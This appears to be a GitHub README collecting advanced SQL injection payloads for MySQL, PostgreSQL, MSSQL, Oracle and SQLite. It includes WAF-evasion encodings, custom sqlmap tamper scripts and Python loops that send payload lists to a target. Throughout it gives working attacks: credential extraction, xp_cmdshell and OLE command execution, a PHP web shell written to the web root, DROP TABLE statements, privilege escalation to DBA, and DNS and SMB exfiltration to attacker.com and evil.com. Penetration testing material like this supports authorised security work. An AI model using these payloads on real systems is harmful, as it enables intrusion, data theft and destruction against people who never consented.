Note:
WARNING:
The techniques showed in this repository is intended only for educational purposes and for testing in authorized environments. https://twitter.com/nav1n0x/ and https://github.com/ifconfig-me take no responsibility for the misuse of the techniques listed below. Use it at your own risk. Do not attack the target you don't have permission to engage with.
- Advanced Error Payloads:
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT version()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- -
- Determining the Number of Columns:
' UNION SELECT NULL, NULL, NULL, NULL --
- Extracting Data:
' UNION SELECT username, password, NULL, NULL FROM users --
- Boolean-Based Blind:
' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END) --
- Time-Based Blind:
' AND IF(1=1, SLEEP(5), 0) --
- Injection in Profile Information: Modify data stored in one place to affect queries executed elsewhere.
Generate detailed error messages by crafting complex payloads:
' UNION SELECT 1, version(), database(), user() FROM dual WHERE 1=CAST((SELECT COUNT(*) FROM information_schema.tables) AS INT) --
Encode parts of your query to evade WAFs:
' UNION SELECT 1, 0x62656e6368, 0x70617373776f7264, user() --
Leverage multiple queries to extract more data:
' UNION SELECT 1, database(), (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()), user() --
Combine data from different databases (when supported):
' UNION SELECT 1, (SELECT column_name FROM db1.table1 LIMIT 1), (SELECT column_name FROM db2.table2 LIMIT 1), user() --
Use time delays to infer data based on conditional responses:
' AND IF((SELECT LENGTH(database()))>5, SLEEP(5), 0) --
Nest conditions to extract specific data:
' AND IF((SELECT SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1))='a', SLEEP(5), 0) --
Force errors conditionally to reveal information:
' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables), 1) --
Use bitwise operations for more obfuscation and complexity:
' AND IF((SELECT ASCII(SUBSTRING((SELECT database()),1,1))) & 1, SLEEP(5), 0) --
Combine multiple advanced techniques for robust and harder-to-detect payloads.
Create a payload that uses both union and time-based injections:
' UNION SELECT IF((SELECT LENGTH(database()))>5, SLEEP(5), 0), 1, user(), 4 --
Combine nested boolean conditions with union-based data extraction:
' UNION SELECT 1, IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables LIMIT 1), 1), 3, 4 --
Automate these advanced techniques using custom scripts to efficiently test and extract data.
import requests
url = "http://example.com/vulnerable.php"
payloads = [
# Advanced Union-Based Injections
"' UNION SELECT 1, version(), database(), user() FROM dual WHERE 1=CAST((SELECT COUNT(*) FROM information_schema.tables) AS INT) -- ",
"' UNION SELECT 1, 0x62656e6368, 0x70617373776f7264, user() -- ",
"' UNION SELECT 1, database(), (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()), user() -- ",
"' UNION SELECT 1, (SELECT column_name FROM db1.table1 LIMIT 1), (SELECT column_name FROM db2.table2 LIMIT 1), user() -- ",
# Advanced Boolean-Based Injections
"' AND IF((SELECT LENGTH(database()))>5, SLEEP(5), 0) -- ",
"' AND IF((SELECT SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1), 1, 1))='a', SLEEP(5), 0) -- ",
"' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables), 1) -- ",
"' AND IF((SELECT ASCII(SUBSTRING((SELECT database()),1,1))) & 1, SLEEP(5), 0) -- ",
# Combined Techniques
"' UNION SELECT IF((SELECT LENGTH(database()))>5, SLEEP(5), 0), 1, user(), 4 -- ",
"' UNION SELECT 1, IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, (SELECT table_name FROM information_schema.tables LIMIT 1), 1), 3, 4 -- ",
]
for payload in payloads:
response = requests.get(url, params={"id": payload})
print(f"Payload: {payload}")
print(f"Response: {response.text}\n")
- MySQL:
' OR 1=1 AND @@version --
- PostgreSQL:
' OR 1=1 AND version() --
- MSSQL:
' OR 1=1 AND @@version --
- Determine the Number of Columns:
' ORDER BY 1 -- ' ORDER BY 2 --
- Extract Column Names:
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --
- Combine Multiple Rows into a Single Output:
' UNION SELECT GROUP_CONCAT(username, 0x3a, password) FROM users --
- Using Comments:
' UNION/**/SELECT/**/NULL,NULL,NULL --
- Changing the Case of SQL Keywords:
' uNioN SeLecT NULL, NULL --
- Inserting Inline Comments:
' UNION/**/SELECT/**/NULL,NULL --
- Using Different Types of Whitespace Characters:
' UNION%0D%0ASELECT%0D%0A NULL,NULL --
- Execute Arbitrary SQL:
'; EXEC xp_cmdshell('whoami') --
- Exfiltrate Data via DNS or HTTP Requests:
'; EXEC master..xp_dirtree '\\evil.com\payload' --
- Reading or Writing Files:
' UNION SELECT LOAD_FILE('/etc/passwd') --
- Bypass WAFs or Target Specific Injection Points:
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=space2comment --level=5 --risk=3
- Some Tamper Scripts I use
tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
Creating your own tamper script for SQLMap involves writing a Python script that modifies the payloads used by SQLMap to evade web application firewalls (WAFs) or other filtering mechanisms. Here is a step-by-step guide to create a custom tamper script.
A tamper script modifies the payload sent to the server. The script should contain a function called tamper
that takes a payload string as an argument and returns the modified payload string.
Here is the basic structure of a tamper script:
#!/usr/bin/env python
import random
__priority__ = 1
def dependencies():
pass
def tamper(payload):
# Modify the payload here
modified_payload = payload
return modified_payload
__priority__
: Defines the order in which tamper scripts are applied.dependencies()
: Checks for any required dependencies.tamper(payload)
: The main function that modifies the payload.
Let's create a simple tamper script that replaces spaces with comments to evade basic filters.
#!/usr/bin/env python
import random
__priority__ = 1
def dependencies():
pass
def tamper(payload):
"""
Replaces space character (' ') with a random inline comment ('/**/')
"""
if payload:
payload = payload.replace(" ", "/**/")
return payload
Now, let's create a more advanced tamper script that randomly URL-encodes characters in the payload.
#!/usr/bin/env python
import random
__priority__ = 1
def dependencies():
pass
def tamper(payload):
"""
Randomly URL encodes characters in the payload
"""
if payload:
encoded_payload = ""
for char in payload:
if random.randint(0, 1):
encoded_payload += "%%%02x" % ord(char)
else:
encoded_payload += char
return encoded_payload
return payload
-
Save the Script: Save your tamper script in the
tamper
directory of your SQLMap installation. For example, save it asrandom_urlencode.py
. -
Use the Script: Use the
--tamper
option in SQLMap to apply your custom tamper script.
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=random_urlencode
- Test: Ensure the script works as intended by running SQLMap with different payloads.
- Debug: Print debug information if necessary. You can add print statements within the
tamper
function to debug your script.
#!/usr/bin/env python
import random
__priority__ = 1
def dependencies():
pass
def tamper(payload):
"""
Randomly URL encodes characters in the payload
"""
if payload:
encoded_payload = ""
for char in payload:
if random.randint(0, 1):
encoded_payload += "%%%02x" % ord(char)
else:
encoded_payload += char
print(f"Original: {payload}")
print(f"Modified: {encoded_payload}")
return encoded_payload
return payload
- Executing Multiple Statements:
⚠️ ⚠️ ⚠️ ⚠️ '; DROP TABLE users; SELECT * FROM admin --
- Using Obfuscated Payloads:
' UNION SELECT CHAR(117,115,101,114,110,97,109,101), CHAR(112,97,115,115,119,111,114,100) --
- Using SQL Functions for Data Exfiltration:
' UNION SELECT version(), current_database() --
- Using DNS Requests for Data Exfiltration:
'; SELECT load_file('/etc/passwd') INTO OUTFILE '\\\\attacker.com\\share' --
- Extracting Data Using JSON Functions:
' UNION SELECT json_extract(column_name, '$.key') FROM table_name --
- Using Custom Tamper Scripts:
sqlmap -u "http://example.com/vulnerable.php?id=1" --tamper=~/location/ofthescript/charencode.py --level=5 --risk=3
- Encode parts of the payload to bypass basic keyword detection.
%27%20UNION%20SELECT%20NULL,NULL,NULL--
- Double encode the payload to evade detection mechanisms.
%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--
- Use hexadecimal encoding for the payload.
' UNION SELECT 0x61646D696E, 0x70617373776F7264 --
- Change the case of SQL keywords.
' uNioN SeLecT NULL, NULL --
- Insert comments within SQL keywords to obfuscate the payload.
' UNION/**/SELECT/**/NULL,NULL --
- Replace spaces with other whitespace characters like tabs or newlines.
' UNION%0D%0ASELECT%0D%0A NULL,NULL --
- Use special characters and concatenation to build the payload dynamically.
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
- Break strings into smaller parts and concatenate them.
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
- Leverage SQL functions to manipulate the payload.
' UNION SELECT VERSION(), DATABASE() --
- Use time delays to infer information from the response.
' AND IF(1=1, SLEEP(5), 0) --
- Use conditions that alter the response based on true or false conditions.
' AND IF(1=1, 'A', 'B')='A' --
- Encode payloads using Base64.
' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --
- Create custom scripts to encode and decode payloads in different formats.
- Use a combination of techniques to create a more complex and harder-to-detect payload.
%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A
- Leverage JSON functions to manipulate and extract data.
' UNION SELECT json_extract(column_name, '$.key') FROM table_name --
- Utilize XML functions to create more complex payloads.
' UNION SELECT extractvalue(1, 'version()') --
Forcing errors in databases can help reveal valuable information about the underlying SQL queries, database structure, and sometimes even the data itself. Here are some advanced techniques to force errors from various databases:
- Introduce a deliberate syntax error to elicit an error message.
' OR 1=1; --
- Leave a quote unclosed to generate an error.
' OR 'a'='a
- Cast a string to an integer to cause a type conversion error.
' UNION SELECT CAST('abc' AS SIGNED) --
- Force a division by zero error.
' UNION SELECT 1/0 --
- Use a function incorrectly to trigger an error.
' UNION SELECT EXP('abc') --
- Use a subquery in a way that causes an error.
' UNION SELECT (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2) AS temp) --
- Use invalid queries to trigger MySQL-specific errors.
' UNION SELECT GTID_SUBSET('abc', 'def') --
- Use invalid operations to cause PostgreSQL errors.
' UNION SELECT TO_NUMBER('abc', '999') --
- Use MSSQL-specific functions incorrectly to trigger errors.
' UNION SELECT CONVERT(INT, 'abc') --
- Query the information schema with an invalid table name.
' UNION SELECT table_name FROM information_schema.tables WHERE table_name = 'non_existent_table' --
- Use a false condition to force an error indirectly.
' AND 1=(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema='non_existent_database') --
- Use recursive queries to force errors.
' UNION SELECT 1 FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4) AS temp WHERE temp=1 --
- Use invalid hexadecimal values to trigger errors.
' UNION SELECT 0xZZ --
- Combine multiple error-forcing techniques for more robust results.
' UNION SELECT CONVERT(INT, 'abc') UNION SELECT 1/0 UNION SELECT TO_NUMBER('abc', '999') --
Below are some advanced and rare SQL injection techniques for MSSQL, MySQL, and Oracle. These techniques go beyond the basic ones and exploit specific features and configurations of the databases.
-
OLE Automation Procedures
DECLARE @Object INT; EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT; EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';
This uses OLE Automation procedures to execute system commands.
-
XP_CMD Shell with Privilege Escalation
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';
This enables
xp_cmdshell
to execute system commands if it's not already enabled. -
Linked Servers
EXEC sp_addlinkedserver 'attacker_server'; EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password'; EXEC ('xp_cmdshell ''net user''') AT attacker_server;
This technique uses linked servers to run commands on a different server.
-
UDF (User Defined Functions) for Remote Command Execution
CREATE TABLE foo(line BLOB); INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so')); SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'; CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');
This technique involves creating a UDF to execute system commands.
-
DNS Exfiltration
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));
This exfiltrates data through DNS requests to an attacker-controlled domain.
-
Binary Log Injections
SET GLOBAL general_log = 'ON'; SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
This exploits the binary log feature to write a web shell.
-
Java Procedures for Command Execution
EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' ); EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '' ); EXEC dbms_java.grant_permission( 'SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' ); CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS import java.io.*; public class cmd { public static String run(String cmd) { try { StringBuffer output = new StringBuffer(); Process p = Runtime.getRuntime().exec(cmd); BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream())); String line = ""; while ((line = reader.readLine())!= null) { output.append(line + "\n"); } return output.toString(); } catch (Exception e) { return e.toString(); } } }; / CREATE OR REPLACE FUNCTION run_cmd(p_cmd IN VARCHAR2) RETURN VARCHAR2 AS LANGUAGE JAVA NAME 'cmd.run(java.lang.String) return java.lang.String'; / SELECT run_cmd('id') FROM dual;
This uses Java stored procedures to execute system commands.
-
UTL_FILE Package for File Access
DECLARE l_file UTL_FILE.FILE_TYPE; l_text VARCHAR2(32767); BEGIN l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W'); UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE'); UTL_FILE.FCLOSE(l_file); END;
This technique uses the
UTL_FILE
package to write files to the server. -
DBMS_SCHEDULER for Job Execution
BEGIN DBMS_SCHEDULER.create_job( job_name => 'job1', job_type => 'PLSQL_BLOCK', job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;', start_date => SYSTIMESTAMP, repeat_interval => NULL, end_date => NULL, enabled => TRUE ); END;
This uses
DBMS_SCHEDULER
to execute jobs that can change database permissions.
Here are some advanced techniques taht specific to some DBMS to force errors and gather valuable information. By using these advanced methods to force errors on different DBMS, you can gather detailed error messages that reveal valuable information about the database, helping you identify and exploit SQL injection vulnerabilities more effectively.
- MySQL provides many functions that, when used incorrectly, can generate errors.
' AND EXP(~(SELECT * FROM (SELECT 1) t)) --
- Using invalid hexadecimal values can cause errors.
' AND 0xG1 --
- Use subqueries that return multiple rows in a single value context.
' AND (SELECT * FROM (SELECT 1,2) t) = 1 --
- PostgreSQL's regex functions can be used incorrectly to cause errors.
' AND 'a' ~ 'b[' --
- Use JSON functions with invalid operations.
' AND jsonb_path_query_first('{"a":1}', '$.a') --
- Use recursive Common Table Expressions (CTE) incorrectly.
' AND WITH RECURSIVE t AS (SELECT 1 UNION ALL SELECT 1 FROM t) SELECT * FROM t --
- MSSQL’s XML functions can generate errors when used with invalid XML.
'; DECLARE @xml XML; SET @xml = '<root><a></a><b></b></root>'; SELECT @xml.value('(/root/c)[1]', 'INT') --
- Conversion functions can cause errors when converting incompatible data types.
'; SELECT CAST('text' AS INT) --
- Use built-in error functions to generate errors.
'; RAISERROR('Error generated', 16, 1) --
- Oracle’s specific functions and data manipulation can cause errors.
' UNION SELECT UTL_INADDR.get_host_address('invalid_host') FROM dual --
- Use XMLType improperly to cause errors.
' UNION SELECT XMLType('<invalid><xml>') FROM dual --
- Leverage Oracle’s assertion package to force errors.
' UNION SELECT SYS.DBMS_ASSERT.noop('invalid_input') FROM dual --
- SQLite’s string functions can generate errors when used improperly.
' UNION SELECT SUBSTR('text', -1, 1) --
- Use mathematical functions with invalid inputs.
' UNION SELECT POW('text', 2) --
- Use date functions with incorrect parameters.
' UNION SELECT DATE('invalid_date') --
import requests
url = "http://example.com/vulnerable.php"
payloads = [
# MySQL
"' AND EXP(~(SELECT * FROM (SELECT 1) t)) -- ",
"' AND 0xG1 -- ",
"' AND (SELECT * FROM (SELECT 1,2) t) = 1 -- ",
# PostgreSQL
"' AND 'a' ~ 'b[' -- ",
"' AND jsonb_path_query_first('{'a':1}', '$.a') -- ",
"' AND WITH RECURSIVE t AS (SELECT 1 UNION ALL SELECT 1 FROM t) SELECT * FROM t -- ",
# MSSQL
"; DECLARE @xml XML; SET @xml = '<root><a></a><b></b></root>'; SELECT @xml.value('(/root/c)[1]', 'INT') -- ",
"; SELECT CAST('text' AS INT) -- ",
"; RAISERROR('Error generated', 16, 1) -- ",
# Oracle
"' UNION SELECT UTL_INADDR.get_host_address('invalid_host') FROM dual -- ",
"' UNION SELECT XMLType('<invalid><xml>') FROM dual -- ",
"' UNION SELECT SYS.DBMS_ASSERT.noop('invalid_input') FROM dual -- ",
# SQLite
"' UNION SELECT SUBSTR('text', -1, 1) -- ",
"' UNION SELECT POW('text', 2) -- ",
"' UNION SELECT DATE('invalid_date') -- ",
]
for payload in payloads:
response = requests.get(url, params={"id": payload})
print(f"Payload: {payload}")
print(f"Response: {response.text}\n")
These advanced error-based SQL injection techniques, you can extract crucial information such as the database name and hostname, which can further aid in your exploitation efforts.
- Use error-based injection to extract the database name.
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --
- Use error-based injection to extract the hostname.
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --
- Use error-based injection to extract the current database name.
' AND 1=CAST((SELECT current_database()) AS INT) --
- PostgreSQL does not directly provide a function for hostname, but you can use other metadata queries or built-in extensions like
inet_server_addr
.' AND 1=CAST((SELECT inet_server_addr()) AS INT) --
- Use error-based injection to extract the current database name.
'; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) --
- Use error-based injection to extract the server hostname.
'; SELECT 1 WHERE 1=CAST(@@servername AS INT) --
- Use error-based injection to extract the current database name.
' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) --
- Use error-based injection to extract the hostname.
' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) --
- SQLite uses a single database per file, but you can force errors to reveal database-related information.
' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) --
- SQLite does not inherently have a hostname since it’s a file-based database. However, you can infer file paths which might give clues.
' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) --
import requests
url = "http://example.com/vulnerable.php"
payloads = [
# MySQL
"' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
"' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
# PostgreSQL
"' AND 1=CAST((SELECT current_database()) AS INT) -- ",
"' AND 1=CAST((SELECT inet_server_addr()) AS INT) -- ",
# MSSQL
"; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) -- ",
"; SELECT 1 WHERE 1=CAST(@@servername AS INT) -- ",
# Oracle
"' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) -- ",
"' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) -- ",
# SQLite
"' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) -- ",
"' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) -- ",
]
for payload in payloads:
response = requests.get(url, params={"id": payload})
print(f"Payload: {payload}")
print(f"Response: {response.text}\n")